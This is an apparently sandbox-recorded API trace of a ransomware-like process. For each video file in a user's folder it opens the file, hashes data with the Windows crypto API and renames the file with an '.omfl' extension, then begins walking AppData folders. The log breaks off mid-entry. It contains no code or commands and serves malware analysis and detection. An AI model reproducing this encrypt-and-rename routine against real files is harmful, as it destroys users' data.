[0134.571] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.571] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.571] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.572] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.572] GetLastError () returned 0x0 [0134.572] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.572] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.572] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.572] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.572] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.573] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\1I6n.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\1i6n.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\1I6n.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\1i6n.mp4.omfl")) returned 1 [0134.575] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\3gHiLbq.flv") returned=".flv" [0134.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\3gHiLbq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\3ghilbq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.575] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=12488) returned 1 [0134.575] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.578] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.579] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.579] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.579] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.580] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.580] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.580] GetLastError () returned 0x0 [0134.580] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.580] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.580] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.580] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.580] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.580] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.581] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\3gHiLbq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\3ghilbq.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\3gHiLbq.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\3ghilbq.flv.omfl")) returned 1 [0134.582] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\CTXT8nO_a Kj.swf") returned=".swf" [0134.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\CTXT8nO_a Kj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\ctxt8no_a kj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.583] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=7392) returned 1 [0134.583] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.586] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.587] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.587] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.587] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.587] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.587] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.587] GetLastError () returned 0x0 [0134.587] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.587] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.587] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.587] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.587] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.587] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.588] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\CTXT8nO_a Kj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\ctxt8no_a kj.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\CTXT8nO_a Kj.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\ctxt8no_a kj.swf.omfl")) returned 1 [0134.590] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\dm U_Np9HP3ItDj5.mp4") returned=".mp4" [0134.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\dm U_Np9HP3ItDj5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\dm u_np9hp3itdj5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.590] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=18608) returned 1 [0134.590] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.593] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.595] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.595] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.595] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.595] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.595] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.595] GetLastError () returned 0x0 [0134.595] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.595] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.595] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.595] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.595] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.595] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.596] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\dm U_Np9HP3ItDj5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\dm u_np9hp3itdj5.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\dm U_Np9HP3ItDj5.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\dm u_np9hp3itdj5.mp4.omfl")) returned 1 [0134.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\EyMB sjR.flv") returned=".flv" [0134.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\EyMB sjR.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\eymb sjr.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.598] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=102099) returned 1 [0134.598] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.603] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.604] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.604] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.604] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.604] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.604] GetLastError () returned 0x0 [0134.604] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.604] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.604] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.604] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.604] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.606] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\EyMB sjR.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\eymb sjr.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\EyMB sjR.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\eymb sjr.flv.omfl")) returned 1 [0134.608] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\HZ8N-3.flv") returned=".flv" [0134.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\HZ8N-3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\hz8n-3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.608] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=90145) returned 1 [0134.608] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.614] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.615] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.616] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.616] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.616] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.616] GetLastError () returned 0x0 [0134.616] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.616] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.616] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.616] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.616] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.618] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\HZ8N-3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\hz8n-3.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\HZ8N-3.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\hz8n-3.flv.omfl")) returned 1 [0134.619] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\lKlK5_-.mkv") returned=".mkv" [0134.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\lKlK5_-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\lklk5_-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.620] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=40999) returned 1 [0134.620] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.624] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.625] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.625] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.625] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.625] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.625] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.625] GetLastError () returned 0x0 [0134.625] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.625] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.625] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.625] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.625] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.625] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.626] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\lKlK5_-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\lklk5_-.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\lKlK5_-.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\lklk5_-.mkv.omfl")) returned 1 [0134.628] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\RPsh6jHGoSprENK2o0W.flv") returned=".flv" [0134.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\RPsh6jHGoSprENK2o0W.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\rpsh6jhgosprenk2o0w.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.628] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=39080) returned 1 [0134.628] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.632] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.633] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.633] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.633] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.633] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.633] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.633] GetLastError () returned 0x0 [0134.633] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.633] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.633] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.633] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.633] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.633] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.634] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\RPsh6jHGoSprENK2o0W.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\rpsh6jhgosprenk2o0w.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\RPsh6jHGoSprENK2o0W.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\rpsh6jhgosprenk2o0w.flv.omfl")) returned 1 [0134.636] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\_4AYLAB.flv") returned=".flv" [0134.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\_4AYLAB.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\_4aylab.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.636] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=93028) returned 1 [0134.636] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.640] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.641] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.641] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.641] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.641] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.641] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.641] GetLastError () returned 0x0 [0134.641] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.641] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.641] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.641] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.642] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.642] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.643] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\_4AYLAB.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\_4aylab.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\_4AYLAB.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\_4aylab.flv.omfl")) returned 1 [0134.645] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.645] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2de0 [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0134.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.646] 